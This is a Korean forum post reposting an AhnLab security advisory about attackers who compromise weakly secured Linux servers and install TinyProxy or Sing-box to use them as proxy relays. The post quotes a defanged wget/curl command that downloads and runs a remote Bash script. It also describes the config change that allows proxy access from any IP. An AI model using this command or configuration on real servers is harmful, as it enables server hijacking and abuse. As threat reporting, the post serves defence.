비교하고 잘 사는, 다나와 : 가격비교 사이트

다나와 앱
다나와 앱 서비스 목록
다나와 APP
다나와 가격비교 No.1 가격비교사이트 다나와 앱으로
간편하게 최저가를 확인하세요.
- -
QR코드
빈 이미지
다나와 앱 서비스 목록 닫기

리눅스 서버 대상 프록시 툴 악용 공격 주의

IP
2025.07.04. 05:24:34
조회 수
75
8
댓글 수
6

공유하기

레이어 닫기

지금 보는 페이지가 마음에 든다면
공유하기를 통해 지인에게 소개해 주세요.

로그인 유저에게는 공유 활동에 따라
다나와 포인트가 지급됩니다.

자세히 >

URL이 복사되었습니다.
원하는 곳에 붙여넣기(Ctrl+V)하세요.

레이어 닫기

* 출처는 안랩입니다.


안랩은 최근 보안 관리가 미흡한 리눅스 서버를 대상으로 공격자가 프록시 도구를 설치시스템을 중계지로 악용하는 사레를 다수 포착했다. 공격자는 TinyProxy나 Sing-box와 같은 정상 소프트웨어 또는 오픈 소스 도구를 활용별도의 악성 행위 없이도 시스템을 프록시 노드로 전환시키고 있었다. 

이번 글에서는 공격자들이 이런 도구를 선택한 이유공격의 주요 특징, 그리고 그 배경에 숨은 목적에 대해 살펴보자.



1. TinyProxy 설치 사례

공격자는 취약한 리눅스 서버에 로그인을 시도했으며, 로그인에 성공한 후에는 아래와 같은 명령으로 Bash 악성코드를 다운로드해 실행했다.


# (wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh


[그림 1] 폴란드어 주석이 포함된 악성 Bash 스크립트


Bash 스크립트는 운영체제 환경에 맞게 apt, yum, dnf를 이용해 TinyProxy를 설치한다. 이후 설정 파일을 조작해 외부에서 접속이 가능하도록 한 후 지속성을 유지시킨다.


[그림 2] TinyProxy 설정 및 지속성 유지 루틴


구체적으로는, TinyProxy의 설정 파일인 “/etc/tinyproxy/tinyproxy.conf” 또는 “/etc/tinyproxy.conf”에서 Allow 및 Deny로 시작하는 접근 제어 규칙을 삭제한 후 “Allow 0.0.0.0/0” 규칙을 추가한다.

 

이 설정은 모든 외부 IP의 접속을 허용하도록 구성하는 것으로, 공격자는 TinyProxy가 사용하는 포트인 8888번에 자유롭게 접근감염된 시스템을 프록시 서버로 악용할 수 있다.


[그림 3] 주석 처리 및 삽입된 TinyProxy 설정


* 전체내용은 아래에서 확인하세요.

https://www.ahnlab.com/ko/contents/content-center/35892

공감/비공감

공감/비공감안내도움말 보기
유용하고 재미있는 정보인가요?
공감이 된다면 공감 버튼을, 그렇지 않다면 비공감 버튼을 눌러 주세요!
공감이나 비공감을 선택 하는 경우 다나와 포인트를 적립해 드립니다. ※ 공감 버튼의 총 선택 횟수는 전체 공개입니다. 비공감 버튼의 선택 여부는 선택한 본인만 알 수 있습니다.

plc-wave 님의 다른 글 보기

1/8
자유게시판 최신 글 전체 둘러보기
2/1
악마의 잡초로 불리는 식물 (7)
7/4 전국 날씨 (6)
인생은 거울과 같다 (10)
작은 희망은 이른 시간밖에는.... (10)
습도 높고 흐린 날씨에 금요일이네요. (10)
리눅스 서버 대상 프록시 툴 악용 공격 주의 (6)
배달 앱 사용자를 위한 보안 가이드 (6)
무더위가 계속 이어집니다. (13)
★☆다나와 복권 당첨☆★ (36)
7월 3일 박스오피스 (8)
전국 대부분 폭염 열대야 수도권 강원 빗방울 (10)
오늘도 너무 더운 하루였네요. (6)
늦은밤 습도가 어마무시 (7)
시원한 콩국 한그릇~^^ (15)
담배 세갑(너튜브) (10)
리버풀 공격수 디오고 조타 교통사고로 사망,향년29세 (11)
모기 잡았네요 (20)
외국인들이 가장 어려워 하는 한국어 (12)
‘오렌지 대명사’ ‘국민 물병’... 델몬트, 139년만에 파산 (28)
7/3(목) 7,876보를 걸었습니다. (18)
이 시간 HOT 댓글!
1/4